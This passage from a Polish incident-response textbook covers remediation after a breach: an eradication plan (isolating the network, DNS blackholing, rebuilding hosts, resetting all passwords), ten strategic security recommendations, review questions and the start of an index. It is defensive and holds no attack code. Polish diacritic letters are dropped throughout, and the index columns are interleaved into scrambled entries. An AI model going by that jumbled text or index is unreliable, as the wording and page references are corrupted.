Odbudowa wszystkich systemw z ograniczonego rodowiska finansowego, na ktrych
doszo do wamania, ze znanego czystego nonika.
Wdroenie planu ograniczenia zagroenia odcina hakerowi dostp do ograniczonego
rodowiska finansowego. W zwizku z tym odbudowa systemw, na ktrych doszo do
zamania zabezpiecze przed procesem eradykacji, nie stanowi problemu. Zanim jednak
przystpisz do pracy, spytaj w zespole ledczym, czy nie trzeba zachowa materiaw
dowodowych z tych systemw.
Sporzdzenie listy kluczowych serwerw w rodowisku korporacyjnym.
Spenienie tego warunku jest konieczne do tego, by mona byo speni nastpny. Organizacja
ma ju list kluczowych systemw znajdujcych si w rodowisku finansowym, ale nie prowadzi
dokadnej ewidencji systemw w rodowisku korporacyjnym. Przykadami wanych serwerw
w rodowisku korporacyjnym s systemy wymiany poczty, serwery SharePoint, udziay plikowe
oraz bazy danych SAP.
Okrelenie listy dozwolonych pocze dla kluczowych serwerw.
Wikszo kluczowych serwerw nie wymaga nieograniczonego dostpu do internetu.
Mona wic na serwerach poredniczcych wprowadzi biae listy uniemoliwiajce
hakerom ustanawianie pocze wychodzcych z dowolnymi systemami w internecie.
Implementacja biaej listy aplikacji w trybie blokowania we wszystkich kluczowych
systemach nalecych do ograniczonego rodowiska finansowego. Oprogramowanie
powinno sprawdza skrty MD5 i certyfikaty plikw binarnych.
Biaa lista aplikacji uniemoliwi uruchomienie szkodliwych programw hakera we wszystkich
systemach, w ktrych doszo do wamania. Ponadto rodek ten zapobiegnie wykonywaniu
szkodliwych programw take przez innych hakerw w przyszoci. Zesp naprawczy
powinien zadba o to, by biaa lista dziaaa w trybie blokowania. Czsto spotyka si
konfiguracje, ktre tylko zgaszaj ostrzeenia. I w kocu program obsugujcy bia list
aplikacji powinien weryfikowa skrty MD5 plikw binarnych oraz podpisy certyfikatw,
aby uniemoliwi przeprowadzenie atakw polegajcych np. na zmianie kolejnoci
wyszukiwania plikw DLL.
Uwaga Zesp naprawczy powinien dokadnie zbada i rozpozna wszelkie potencjalne trudnoci techniczne
zwizane z wprowadzaniem zalecanych rozwiza, jak rwnie rozway ewentualne korzyci
z ich wdroenia. W przypadku biaej listy aplikacji naley zdawa sobie spraw, e wdroenie
odpowiedniego oprogramowania moe by trudne, e program ten musi dziaa w trybie blokowania
oraz e powinien sprawdza zarwno skrty MD5, jak i sygnatury plikw binarnych, aby zapewni
najwyszy poziom bezpieczestwa. Bez tej wiedzy organizacja moe wdroy bia list aplikacji
w sposb niezwikszajcy bezpieczestwa systemw.
Dziki cisej wsppracy zespou naprawczego z rnymi zespoami IT wszystkie punkty

planu zostay wdroone szybko i prawidowo. Zesp naprawczy sprawowa nadzr na ca akcj
i sprawdzi, czy wszystko zostao zrobione zgodnie z zaleceniami. Wdraanie wszystkich zalece
trwao tylko cztery tygodnie, mimo e w midzyczasie przebiegay te przygotowania do procesu
cakowitej likwidacji zagroenia.
W poprzednim rozdziale napisalimy, e czynnoci wykonywane w ramach wstpnej akcji
naprawczej nie powinny zaalarmowa hakera. Gdyby do tego doszo, intruz mgby zmieni
narzdzia, sposb dziaania i procedury, przez co wszystkie dotychczasowe wysiki zespou
ledczego okazayby si bezwartociowe. W omawianym przypadku haker prawdopodobnie
zorientowa si, e go wykryto, gdy straci dostp do ograniczonego rodowiska finansowego.
Jednak to nie znaczy, e tak mona przeprowadzi kad akcj. Przykadowo w niektrych
organizacjach panuje przekonanie, e naley jak najszybciej zmieni dane powiadczajce do
wszystkich kont uytkownikw, na ktrych doszo do wamania. atwo to uzasadni, gdy haker
wie, e zosta wykryty. Oglnie rzecz biorc, nie jest to najlepszy pomys. Zobaczmy, dlaczego.
Wikszo hakerw ma dostp do wielu kont uytkownikw. Jeli wic zmienisz haso do zaledwie
piciu kont z trzystu, ktre mogy zosta zdobyte przez hakera, odniesiesz niewielkie korzyci.
W rzeczywistoci w ten sposb mona nawet utrudni ledzenie poczyna hakera, ktry przerzuci
si na inne konto lub zacznie korzysta z innej metody dostpu do systemw. Ponadto, gdy haker
zorientuje si, e go wykryto, sprbuje wama si do jeszcze wikszej liczby kont. Wwczas
konieczne bdzie zmienienie kolejnych hase, co wymaga czasu i pracy.
Uwaga Cho powyej wyjanilimy, dlaczego zmiana hase do kont uytkownikw przed procesem
eradykacji nie jest dobrym pomysem, musimy przyzna, e s wyjtki od tej reguy. W poprzednim
rozdziale opisalimy incydent, w ktrym haker za pomoc skryptw co noc instalowa szkodliwe
oprogramowanie na czterdziestu kontrolerach domen. Organizacja, ktra pada ofiar tego hakera,
codziennie przebudowywaa dotknite systemy i zmieniaa hasa dotknitych uytkownikw.
Robiono to, by uniemoliwi intruzowi wyrzdzenie realnych szkd w rodowisku (np. wykradzenie
danych) podczas prowadzenia przygotowa do kompleksowej akcji majcej na celu wyrugowanie
hakera ze rodowiska. Postanowiono zmusi hakera do cigego atakowania, tak aby nie mg
na dobre zadekowa si w rodowisku. Realizacja tego planu wymagaa wiele pracy oraz cisej
komunikacji zespow ledczego i naprawczego z kierownictwem. Ponadto przyjta strategia bya
skuteczna tylko dlatego, e zesp ledczy posiada szczegowe informacje na temat aktywnoci
hakera, wic bez problemu identyfikowa wszystkie systemy i konta, ktre udawao mu si zama
w godzinach nocnych.
Pozbywanie si hakera ze rodowiska

Po sformuowaniu wstpnego planu naprawy i rozpoczciu jego wdraania zesp naprawczy
skoncentrowa si na sporzdzaniu planu cakowitej likwidacji zagroenia. Celem tego procesu byo
odcicie hakerowi dostpu do rodowiska, zamknicie pierwotnej drogi ataku oraz przywrcenie
zaufania organizacji do jej wasnych systemw komputerowych i kont uytkownikw. Pamitajc,
e ledztwo jest jeszcze w toku, zesp naprawczy przedstawi nastpujcy plan eradykacji, ktrego
punkty naleao realizowa w podanej kolejnoci.
Odczenie od internetu caego rodowiska z wyjtkiem aplikacji niezbdnych do prowadzenia
dziaalnoci. Wprowadzenie obostrze dotyczcych nawizywania pocze z partnerami
biznesowymi. Zachowanie cznoci wewntrz sieci.
Prawidowe wykonanie tego punktu planu uniemoliwi hakerowi uzyskanie dostpu do
rodowiska przez cay czas trwania akcji, dziki czemu nie wamie si on do kolejnych systemw.
Specyfika dziaalnoci firmy czsto wymaga, aby jakie poczenie z internetem byo pozostawione,
ale naley ograniczy je do absolutnego minimum. Przykadowo w omawianym przypadku
pewne aplikacje sieciowe znajdujce si w ograniczonym rodowisku finansowym nie mogy
przesta dziaa. Posegmentowano je ju w fazie ograniczania zasigu zagroenia, wic ryzyko
naraenia ich bezpieczestwa byo minimalne. Zesp naprawczy powinien dopilnowa,
by internet zosta odczony w wielu miejscach w obrbie rodowiska.
Zablokowanie wszystkich znanych szkodliwych adresw IP. Implementacja czarnej dziury
DNS dla wszystkich znanych szkodliwych domen.
Wszystkie znane adresy IP powinny by blokowane jak najbliej wzw dostpu do internetu.
W wielu organizacjach implementuje si czarne listy adresw IP na routerach brzegowych.
Dla kadej znanej szkodliwej domeny naley zdefiniowa czarn dziur DNS (ang. DNS
blackhole). Jedn z najlepszych metod jest takie skonfigurowanie nazw szkodliwych hostw,
aby trafiay na adres IP systemu sucego tylko do monitorowania. Nastpnie mona
przyglda si ruchowi do tego systemu, aby zidentyfikowa w nim hosty o zamanych
zabezpieczeniach. Technika ta sprawdza si najlepiej, gdy dozwolony jest tylko ruch
wychodzcy DNS z naszych serwerw DNS, poniewa haker moe skonfigurowa publiczny
serwer DNS, np. Google, do rozpoznawania nazw DNS. W niektrych organizacjach
wdraa si blokady domen na serwerach proxy. Jednak trzeba mie wiadomo, e haker
moe obej taki serwer sieciowy.
Odczenie wszystkich systemw, na ktrych doszo do wamania, od sieci i ich odbudowa.
Systemy, w ktrych wykryto lady wamania, naley odczy od sieci jak najszybciej po
ograniczeniu cznoci z internetem. Chodzi o to, by uniemoliwi rozprzestrzenianie si
infekcji na inne systemy.
Systemy ze zamanymi zabezpieczeniami dzieli si na dwie kategorie zainfekowane szkodliwym
oprogramowaniem i takie, do ktrych haker ma dostp, ale nie zawieraj szkodliwego
oprogramowania. W wikszoci organizacji przebudowuje si tylko ten pierwszy rodzaj systemw.
Jednak czasami system moe by zbyt wany dla dziaalnoci firmy, aby go przebudowywa.
W takich przypadkach najlepszym rozwizaniem jest przeprowadzenie kompletnej analizy

ledczej i dokadne zbadanie znalezionego szkodliwego oprogramowania. Na podstawie
wynikw tych analiz zesp naprawczy powinien opracowa szczegow instrukcj usuwania
wirusa, zawierajc dokadne informacje, jak pozby si wszystkich artefaktw, takich jak
klucze rejestru, pliki konfiguracyjne, sam plik binarny itd.
Zmiana hase do wszystkich kont uytkownikw w obu rodowiskach.
Jest to jedno z zalece najtrudniejszych do realizacji. Odnosi si ono do wszystkich kont,
a nie tylko tych, na ktrych odkryto dowody wamania, a wic kont wszystkich zwykych
uytkownikw, kont usugowych, administratorw lokalnych, lokalnych kont linuksowych,
kont administratorw baz danych itd. Jeeli wiadomo, e haker wykrad pewn ilo hase,
najlepiej przyj zaoenie, e zdoby je wszystkie.
Czsto nie da si zmieni wszystkich hase w sensownym czasie, a w niektrych przypadkach
trzeba dodatkowo mie specjaln zgod. Dlatego zesp naprawczy musi okreli, ktre konta
s naraone na najwiksze ryzyko. W omawianym przypadku do grupy tej nale konta
zwykych uytkownikw systemw Windows i Linux, konta usugowe, konta administratorw
lokalnych oraz konta baz danych. Nastpnie zesp powinien dowiedzie si, czy istnieje
moliwo zmiany tych hase w cigu dwch dni podczas procesu eradykacji. Jeeli nie mona
zmieni hase do niektrych kont (powiedzmy, e dotyczy to baz danych), naley zadba
przynajmniej o te najwaniejsze, np. konto sa do wszystkich baz danych Microsoft SQL.
Jeli jest moliwo zmiany hase do wszystkich kont uytkownikw, ale nie w trakcie procesu
eradykacji, naley podzieli akcj na etapy i najpierw zmieni hasa do najwaniejszych kont,
a potem do pozostaych wg ustalonego harmonogramu.
Wyczenie wszystkich kont administracyjnych w systemie Windows.
To uniemoliwi hakerowi dostp do wielu systemw za pomoc jednego konta. Akcj t
atwiej przeprowadzi przy uyciu obiektu zasad grupy systemu Windows (GPO) ni
programu do przypisywania skomplikowanych hase kontom administracyjnym we
wszystkich systemach. Modyfikacje te mog zmusi administratorw lokalnych do zmiany
sposobu pracy, jeli do tej pory korzystali ze swoich kont do wykonywania codziennych
obowizkw. Dodatkow zalet tego rozwizania jest zwikszenie odpowiedzialnoci
administratorw systemw, poniewa bd musieli zacz uywa swoich osobistych
kont administracyjnych.
Wyczenie moliwoci logowania si na konto root przez SSH we wszystkich
systemach Linux.
Ta zmiana zwiksza bezpieczestwo rodowiska Linux w taki sam sposb jak wyczenie
konta lokalnego administratora zwiksza bezpieczestwo w rodowisku Windows.
Usunicie tymczasowych rodkw wprowadzonych w celu ograniczenia zasigu incydentu.
Tymczasowe rodki ograniczajce zasig incydentu kiedy trzeba usun i dobrym momentem
jest wanie kocwka procesu eradykacji. Naley czeka z tym do samego koca, aby
zapewni ochron ograniczonego rodowiska finansowego na wypadek, gdyby co si
nie udao podczas ostatecznej likwidacji zagroenia.
Weryfikacja poprawnoci wykonania wszystkich punktw planu.

Jest to jeden z najwaniejszych elementw procesu eradykacji. Zesp naprawczy musi
sprawdzi, czy wszystkie zmiany zostay wprowadzone prawidowo. Specjalici powinni wic
upewni si, e wszystkie dotknite zagroeniem systemy zostay prawidowo przebudowane
lub oczyszczone, e zmieniono hasa do wszystkich kont uytkownikw, e odpowiedni ruch
sieciowy jest blokowany oraz e wszystkie prby nawizania poczenia ze rodowiskiem
przez znane szkodliwe adresy IP, domeny itp. s od razu zgaszane w postaci alarmu.
Utrzymywanie podwyszonej czujnoci przy monitorowaniu dziennikw przez
przynajmniej dwa tygodnie, aby zdoby pewno, e haker nie zachowa adnej drogi
dostpu do rodowiska i e nie ma moliwoci ponownie si do niego wama.
To rwnie jest bardzo wany punkt planu eradykacji. Monitorowanie wszelkich znanych
ladw szkodliwej dziaalnoci po zakoczeniu procesu likwidacji zagroenia pozwala wykry
wszystkie zainfekowane systemy, ktre zostay przeoczone wczeniej. Wyobra sobie np., e
pewien system jest zainfekowany, ale jego uytkownik wyjecha za granic i jest niedostpny
w sieci przez wikszo czasu trwania procesu reakcji na incydent. Istnieje ryzyko, e infekcja
w tym systemie zostanie przeoczona. Gdy uytkownik podczy go do rodowiska korporacyjnego,
znajdujcy si w nim wirus podejmie prb poczenia si ze swoim serwerem dowodzcym.
Dziki monitoringowi zdarzenie to zostanie natychmiast wykryte i bdzie mona rozwiza
problem od rki. Albo wyobra sobie, e haker zdoa odzyska dostp do rodowiska. Jeli intruz
ten sprbuje uy znanego nam wirusa lub rozpoznanego jako zagroone konta uytkownika,
dziki monitoringowi zesp ledczy od razu zostanie o tym fakcie poinformowany.
Pozosta jeszcze jeden bardzo wany etap eradykacji. Jego przeprowadzenie uniemoliwia hakerowi
ponowne wykorzystanie luki w zabezpieczeniach, ktra pierwotnie daa mu dostp do naszego
rodowiska. Jest to wane, poniewa zesp naprawczy nie moe dopuci do tego, by haker powrci
nastpnego dnia po zakoczeniu procesu eradykacji. Jednak plan tego procesu zosta opracowany,
zanim zesp ledczy ustali, jak haker zdoa wej do rodowiska. W tym przypadku wiemy, e intruz
wykorzysta luk w zabezpieczeniach starej aplikacji sieciowej umoliwiajc wstrzyknicie kodu
SQL. Gdy zesp naprawczy otrzyma t informacj, doda do planu eradykacji nastpujcy punkt.
Wyczenie przestarzaej aplikacji i obsugujcych j serwerw z uytku.
Zaprzestanie korzystania z przestarzaej aplikacji sieciowej byo lepszym rozwizaniem ni
podjcie prby zaatania jej luk bezpieczestwa. W organizacji podjto decyzj, e lepiej
bdzie wyczy t aplikacj i wszystkie obsugujce j serwery, ni przeprowadza inspekcj
jej kodu pod ktem luk bezpieczestwa i ewentualnie pisa jej kod od nowa.
Zesp ledczy nie zawsze jest w stanie wykry pierwotn przyczyn incydentu. Proces eradykacji
nie musi wic obejmowa dziaa zwizanych z likwidacj tej przyczyny, cho najlepiej, aby byo
inaczej. Lepiej przeprowadzi proces oczyszczania rodowiska bez znajomoci metody, jak haker si
do niego dosta, ni odkada t akcj w nadziei, e w kocu uda si czego dowiedzie. Dziaania
wykonywane w ramach procesu likwidacji zagroenia zmusz hakera do podjcia kolejnej prby
wamania si do rodowiska, co zwikszy nasze szanse na wykrycie jego sposobu dziki zwikszonym
rodkom bezpieczestwa i ulepszonemu monitorowaniu.
Kolejno wykonywania punktw planu eradykacji jest wana, poniewa kolejne czynnoci s
tak zaplanowane, aby ewentualny problem na ktrymkolwiek etapie, np. nieprawidowe odcicie
poczenia z internetem, nie umoliwia hakerowi odzyskania dostpu do rodowiska. Ponadto
w planie eradykacji uwzgldnia si ryzyko, e haker moe zachowa drog dostpu do rodowiska,
opisuje si dziaania pozwalajce ograniczy cieki dostpowe oraz wdraa mechanizmy zwikszajce
szans na wykrycie aktywnoci hakera. Powiedzmy np., e podczas ledztwa przeoczono system
z zainstalowanymi tylnymi drzwiami, ktry podczas procesu eradykacji poczy si ze swoim
serwerem dowodzcym. Dziki zmianie hase do wszystkich kont uytkownikw na wczesnym
etapie procesu likwidacji zagroenia i monitorowaniu wszelkiej podejrzanej aktywnoci na tych
kontach mona szybko wykry wszelkie prby wykorzystania przez hakera zdobytych wczeniej
kont. Do tego oczywicie konieczne jest zdefiniowanie alarmw dla wszystkich kont uytkownikw,
o ktrych wiadomo, e kto si na nie wama, ale zespoy ledcze czsto si na to decyduj i tak
te byo w omawianym przypadku.
Podczas planowania procesu eradykacji zesp naprawczy musia okreli ramy czasowe caego
przedsiwzicia. Czas jest bardzo wany ze wzgldu na opisan w poprzednim rozdziale koncepcj
strefy uderzeniowej zbyt wczesne rozpoczcie czynnoci moe spowodowa, e co przeoczymy,
natomiast zbyt dugie czekanie naraa nas na to, e haker wyrzdzi wicej szkd. Zesp naprawczy
w porozumieniu z zespoem ledczym, liderem incydentu i kierownictwem firmy wybra na
rozpoczcie procesu eradykacji weekend mniej wicej trzy tygodnie po dacie podjcia decyzji,
a wic sze tygodni od chwili rozpoczcia procesu reakcji na incydent. W ten sposb zapewniono
zespoowi ledczemu wystarczajco duo czasu do wdroenia wstpnych czynnoci zaradczych
i zaplanowania ostatecznego procesu likwidacji zagroenia.
Tydzie przed planowanym rozpoczciem procesu eradykacji zesp zajmujcy si
przenoszeniem danych z przestarzaej aplikacji sieciowej zacz mie problemy. Powiadomili
zesp naprawczy, e nie bd w stanie dokoczy prac przed rozpoczciem gwnego
przedsiwzicia. Wszystkie inne dziaania szy zgodnie z planem. W zwizku z zaistnia sytuacj
zespoy ledczy i naprawczy w porozumieniu z kierownictwem postanowiy przeoy akcj
eradykacji o tydzie. Ten dodatkowy czas wystarczy na przeniesienie w odpowiednie miejsce
wszystkich danych ze starej aplikacji sieciowej, zatem zminimalizowano negatywny wpyw procesu
na dziaalno przedsibiorstwa. W poprzednim rozdziale napisalimy, e przesuwanie terminu
moe by kopotliwe i naley tego unika, ale w tym przypadku dodatkowy czas pozwoli
zminimalizowa negatywne skutki procesu dla dziaania firmy oraz umoliwi grupom
technicznym wykonanie wszystkich zada. Potem proces eradykacji przebieg pomylnie
i bez wikszych problemw.
Podczas akcji eradykacyjnej zesp naprawczy suy tylko pomoc i nadzorowa przebieg
procesu nikt z jego czonkw nie bra bezporedniego udziau w pracach. Jedynym konkretnym
zadaniem tego zespou byo tylko sprawdzenie, czy wszystkie zalecenia zostay prawidowo
zrealizowane. Lider zorganizowa poczenie konferencyjne midzy wszystkimi zainteresowanymi
stronami z caego kraju i codziennie przeprowadza po trzy pgodzinne zebrania, na ktrych
poszczeglne zespoy mogy informowa o postpie swoich prac. Zebrania odbyway si na tyle
czsto, e kierownictwo miao poczucie panowania nad sytuacj, i jednoczenie byy na tyle krtkie,
e czonkowie zespow mogli skupi si na swojej pracy, a nie na przygotowywaniu raportw.
Ponadto do obowizkw zespou naprawczego naleao dopilnowanie, aby punkty planu byy
wykonywane w odpowiedniej kolejnoci oraz by nikt nie rozpocz kolejnego etapu, jeli nie
zakoczono poprzedniego. W ten sposb zapewniono powodzenie caej akcji.
Strategia na przyszo
Zesp naprawczy odbywa zebrania jeszcze przez dwa tygodnie po zakoczeniu procesu eradykacji.
W pierwszym tygodniu sporzdzi list wnioskw wycignitych ze zdarzenia. Wiele informacji
otrzyma od zespow technicznych, ktre zajmoway si wdraaniem poszczeglnych punktw planu.
Jeden z wnioskw dotyczy sposobu korzystania z kont usugowych. Zesp odkry, e pewnego
konta usugowego uywao dwanacie serwerw Microsoft IIS, cho powinno by ich tylko pi.
Pozostaych siedem odkryto, gdy usuga IIS nie chciaa si na nich uruchomi z powodu zmiany
hasa. Jeli znowu bdzie trzeba przeprowadzi proces eradykacji, zesp bdzie ju wiedzia,
e to konto jest uywane w wikszej liczbie systemw ni pocztkowo sdzono.
W drugim tygodniu po zakoczeniu procesu eradykacji zesp naprawczy przejrza swoje notatki
i wyniki ledztwa oraz przystpi do opracowywania planu strategicznego. Zalecenia strategiczne maj
charakter oglny i opisuj oglne cele, wic czonkowie zespou nie musieli planowa szczegowych
dziaa ani zastanawia si, czy proponowane rozwizania s wykonalne w krtkim czasie. Dlatego
zesp przedstawi dziesi punktw, ktrych realizacja powinna zwikszy bezpieczestwo firmy.
Wybrano tak liczb, a nie inn, poniewa realizacja tylu zalece pozwala na znaczne podniesienie
poziomu bezpieczestwa, a jednoczenie jest ona na tyle maa, e kierownictwo nie powinno mie
problemu z dokadnym rozwaeniem kadego punktu. Oto ta lista zalece.
Implementacja uwierzytelniania dwuskadnikowego dla wszystkich kont administracyjnych
w systemach Windows i Linux. Dotyczy to take dostpu do serwera wstpnego.
Uwierzytelnianie dwuskadnikowe dla kont administracyjnych ograniczy ryzyko wamania
na ktrekolwiek konto administratora. Zdaniem zespou naprawczego jest to bardzo wany
punkt, poniewa jego realizacja uniemoliwi hakerowi posugiwanie si w rodowisku
pojedynczymi nazwami uytkownika i hasami.
Zatrudnienie na peny wymiar czasu dwch dodatkowych specjalistw od zabezpiecze.
Cho do tej pory du wag przywizywano do bezpieczestwa komputerowego, to jednak
bardziej skupiano si na kupowaniu sprztu do ochrony rodowiska ni na zatrudnianiu
wysoko wykwalifikowanych pracownikw. Zdaniem zespou naprawczego wzmocnienie
dziau bezpieczestwa o dwch specjalistw umoliwi wiksze skupienie na dostosowywaniu
ustawie urzdze zabezpieczajcych oraz na alarmach.
Okrelenie kwestii bezpieczestwa jako istotnego czynnika cyklu tworzenia wszystkich
wewntrznie wytwarzanych aplikacji.
W firmie aplikacje sieciowe tworzono i serwisowano zgodnie z ustalonym cyklem rozwoju
oprogramowania, ale nie obejmowa on kwestii bezpieczestwa. Zesp naprawczy uzna,
e zalecenie to pozwoli zminimalizowa ewentualne ryzyko wamania do rodowiska przez
luk w ktrej z publicznie dostpnych aplikacji sieciowych.
Implementacja biaej listy aplikacji na wszystkich kluczowych serwerach w rodowisku

korporacyjnym.
Prawidowe wdroenie biaej listy aplikacji na najwaniejszych serwerach zminimalizuje
ryzyko wykonania przez hakera szkodliwego kodu. Pamitaj jednak, e lista taka nie
przeszkodzi intruzowi w uwierzytelnieniu si w systemie i kradziey danych za pomoc
narzdzi, ktre wchodz w skad tego systemu. Zesp naprawczy uzna to zalecenie za
istotne, poniewa haker zainstalowa na rnych serwerach w rodowisku wiele tylnych drzwi.
Implementacja technicznych rodkw wymuszajcych przepyw wychodzcego ruchu
sieciowego przez aplikacj poredniczc.
Przepuszczanie caego ruchu przez jedn infrastruktur daje wiksz kontrol nad nim
i umoliwia jego podgldanie. Ponadto aplikacje poredniczce analizuj wszystkie pakiety pod
ktem ladw nienormalnej aktywnoci i zgodnoci ze standardem RFC. Niektre backdoory
wykorzystuj niestandardowe protokoy. Przykadem jest program przesyajcy dane przez
port TCP 80 (HTTP) w formie niezgodnej ze standardem HTTP (RFC 2616). Zesp naprawczy
uzna, e realizacja tego zalecenia udaremni przesyanie danych generowanych przez niektre
backdoory, a przynajmniej pozwoli na ostrzeganie administratorw o przypadkach wykrycia
nienormalnego ruchu, ktremu naley si bliej przyjrze.
Implementacja kompletnego programu do testowania penetracyjnego, ktry umoliwi
sprawdzanie, czy zmiany wprowadzane w rodowisku nie powoduj osabienia zabezpiecze.
Kompleksowe testy penetracyjne opracowane przez wysoko wykwalifikowanych pracownikw
wewntrznych lub znane firmy usugowe mog zredukowa ryzyko pozostawienia luk
w zabezpieczeniach i nieprawidowych ustawie konfiguracyjnych. Testom tym powinno si
poddawa wszystkie najwaniejsze elementy infrastruktury regularnie, np. co rok, oraz po
wprowadzeniu kadej powanej zmiany architektonicznej. Zdaniem zespou naprawczego
dziki temu rodkowi moe da si zidentyfikowa luk wykorzystan przez hakera do
wamania si do rodowiska.
Zakup najnowszego oprogramowania ledczego i zintegrowanie go z systemem zarzdzania
informacjami i zdarzeniami bezpieczestwa informatycznego (SIEM) oraz systemem
zapobiegania wamaniom w celu stworzenia mechanizmu prawie na bieco informujcego
o niebezpieczestwie.
Organizacja musi dokadnie przeanalizowa najnowsze zagroenia bezpieczestwa, aby na
podstawie zdobytych informacji skutecznie wykorzysta swoj infrastruktur do rejestrowania
danych i monitorowania systemw. Zdaniem zespou naprawczego zalecenie to ma wpyw na
dugoterminowe bezpieczestwo organizacji, poniewa jeden z adresw IP wykorzystanych
przez hakera by uywany take przy wczeniej wykrytych atakach. Dobry system ledczy od
razu zaalarmuje odpowiednie osoby, gdy wykryje ruch do znanego szkodliwego adresu IP.
Implementacja programu instalowania poprawek bezpieczestwa aplikacji, ktre s czstym
celem atakw, w systemach uytkownikw kocowych.
Realizacja tego zalecenia ma na celu wzmocnienie oglnego bezpieczestwa organizacji, cho

nie ma ono bezporedniego znaczenia w omawianym przypadku. Zesp naprawczy uzna, e
warto to zrobi w celu ochrony przed atakami typu spear phishing, ktre s bardzo popularne.
Implementacja we wszystkich systemach uytkownikw kocowych zapr sieciowych
uniemoliwiajcych komunikacj midzy tymi systemami.
Wikszo systemw uytkownikw kocowych nie musi bezporednio komunikowa si
midzy sob. Wykorzystuj do tego serwery i inne systemy, takie jak np. poczta elektroniczna,
DNS czy udziay plikowe. Zesp naprawczy doszed do wniosku, e realizacja tego pomysu
utrudni hakerowi poruszanie si po rodowisku i prowadzenie rekonesansu.
Wzmocnienie bezpieczestwa baz danych i pocze z bazami danych. Naley postpowa
zgodnie z wytycznymi NSA dotyczcymi konfiguracji zabezpiecze.
Znaczna cz kluczowych danych organizacji bya przechowywana w bazach danych.
Dlatego naleao wzmocni bezpieczestwo zarwno systemw przechowujcych te bazy,
jak i samych baz danych. Ponadto istniej poczenia midzy bazami danych znajdujcymi
si w ograniczonym rodowisku finansowym i bazami danych zlokalizowanymi w strefie DMZ.
Zesp naprawczy uzna, e realizacja tego zalecenia ograniczy ewentualn aktywno hakera
tylko do rodowiska, do ktrego pierwotnie si wamie.
W INTERNECIE
www.nsa.gov/ia/mitigation_guidance/security_configuration_guides
Wszystkie przedstawione zalecenia dotyczyy aspektw technicznych, cho w skad zespou

naprawczego wchodzili przedstawiciele dziaw operacji biznesowych, PR i prawnego. Z reguy
plany naprawcze obejmuj tylko kwestie techniczne. Jeli wymagane jest podjcie dziaa np. przez
dzia PR, najczciej dotyczy to reakcji na jakie publikacje lub zadbania o sprawy wizerunkowe
firmy w zwizku z incydentem. Tego rodzaju dziaania nie nale do planw ograniczania ani
eradykacji zagroenia.
I CO Z TEGO
W rozdziale tym szerzej przedstawilimy koncepcje opisane w poprzednim rozdziale. Chcielimy
pokaza, jak ich stosowanie wyglda w praktyce. Proces naprawczy nigdy nie jest tak prosty jak
osiem punktw przedstawionych w poprzednim rozdziale. Zawsze s jakie wtpliwoci i wymogi
do spenienia. O powodzeniu operacji mona mwi, gdy haker zostanie cakowicie pozbawiony
dostpu do rodowiska, luka w zabezpieczeniach wykorzystana przez hakera zostanie zlikwidowana
oraz zostan wdroone rodki podnoszce poziom bezpieczestwa organizacji. Dopiero spenienie
tych trzech warunkw daje prawo do ogoszenia sukcesu nawet jeli nie wdroylimy
doskonaych zalece.
Opisalimy nie tylko sposb przeprowadzenia procesu naprawczego, ale dodatkowo wyjanilimy,
dlaczego zostay przedstawione takie, a nie inne zalecenia. W tego typu akcjach nic nie zastpi
specjalistycznej wiedzy technicznej. Mamy nadziej, e skorzystasz z informacji zawartych w tym
rozdziale podczas rozwizywania wasnych problemw. Musisz jednak pamita, e kady incydent
jest inny, wic metody skuteczne w jednym rodowisku mog okaza si bezwartociowe w innym.
Z rozdziau tego naley zapamita przede wszystkim trzy rzeczy. Po pierwsze, nie ma jedynego
poprawnego sposobu przeprowadzenia procesu naprawy kada sytuacja jest inna i wymaga
rozwizania innych problemw. Po drugie, plany naprawcze musz by elastyczne, a nie ustalone
raz na zawsze. Zesp naprawczy powinien reagowa na zmieniajc si sytuacj i w zwizku
z otrzymywaniem nowych informacji, poniewa w wielu przypadkach ledztwo toczy si w czasie
aktywnoci hakera, wic sprawa jest dynamiczna. Po trzecie, odpowiedzialno za powodzenie
akcji naprawczej spoczywa na barkach zespou naprawczego. To jego czonkowie odpowiadaj
za prawidowe wykonanie wszystkich czynnoci w odpowiednim czasie.
PYTANIA
1. Wymie przynajmniej trzy inne zalecenia strategiczne, ktrych realizacja byaby Twoim
zdaniem korzystna dla organizacji opisanej w pierwszym studium przypadku.
2. Czy Twoim zdaniem wdroenie natychmiastowego planu ograniczajcego zasig incydentu
byo dobrym posuniciem w tym przypadku? Dlaczego?
3. Wymie trzy z czterech gwnych celw procesu eradykacji.
4. Czy czonkowie zespou naprawczego z dziaw o profilu nietechnicznym powinni mie
udzia w formuowaniu zalece technicznych?
5. Opracuj plan naprawczy dla przypadku drugiego. W planie tym przedstaw tylko oglne
zalecenia, bez szczegowych informacji o sposobie ich wdroenia. Uzasadnij kad
ze swoich propozycji.
Skorowidz
A
ACH, automatyczny system rozrachunkowy, 149 danych, 269
ACL, access control list, 28 wybr metod, 282
adres pocztkowych, 141, 142
IP, 235 sieciowych, 215
MAC, 235 syslog, 424
ADS, Alternate Data Streams, 298 zebranych na ywo, 61
AFP, Apple File Protocol, 427 dowodw z list szybkiego dostpu, 367
AIM, America Online Instant Messenger, 478 dynamiczna, 506
artefakty, 479 rczna, 507
format dziennikw, 479 zautomatyzowana, 507
narzdzia, 481 dziennikw, 82
preferencje, 480 porady, 320
przechowywanie dziennikw, 478 zdarze, 321
akcja katalogu \Recycler, 370
mieszana, 541 kopii woluminu, 304
na ywo, 29 Kosza, 372
natychmiastowa, 540 list ACL, 571
opniona, 541 listy szybkiego dostpu, 368
algorytm acuchw, 498
MD5, 492 na serwerze, 209
SHA2, 492 na ywo, 60, 156, 163, 175
BASE64, 502 osi czasu, 246
alternatywne strumienie danych, ADS, 293, 298 pamici, 81, 376
analiza plikw
aktywnoci hakera, 315 .job, 326
artefaktw z Kosza, 369 OST, 467
czasowa, 392 PE, 504
czstotliwoci, 246 pobieranych z wyprzedzeniem, 308, 310
analiza
B
pliku
\$Recycle.Bin, 371 backdoor, 31, 316, 484
SchedLgU.txt, 327 Poison Ivy, 347, 379
stronicowania, 382 badanie aplikacji, 437, 441
podejrzanych cieek wykonawczych, 246 Baker, 131
rejestru, 336, 363 baza danych, 263
ruchu sieciowego, 209 ESE, 449, 450
statyczna, 491 FileAdvisor, 493
systemu plikw, 291 MSSQL, 264
szkodliwego oprogramowania, 61, 486, 491, 506 MySQL, 265
ledcza, 61 Oracle, 267
tabeli MFT, 293, 300 sqlindex, 416
tropw wewntrznych, 133 SQLite, 480
tropw zewntrznych, 134 SQLite3, 474
typowych atakw na pami, 382 Beale, 131
usug, 344 bezpieczestwo, 485
zada zaplanowanych, 328 komputerowe, 68
zdarze, 312 BHO, Browser Helper Objects, 349
zdarze usug, 319 blackholing DNS, 555
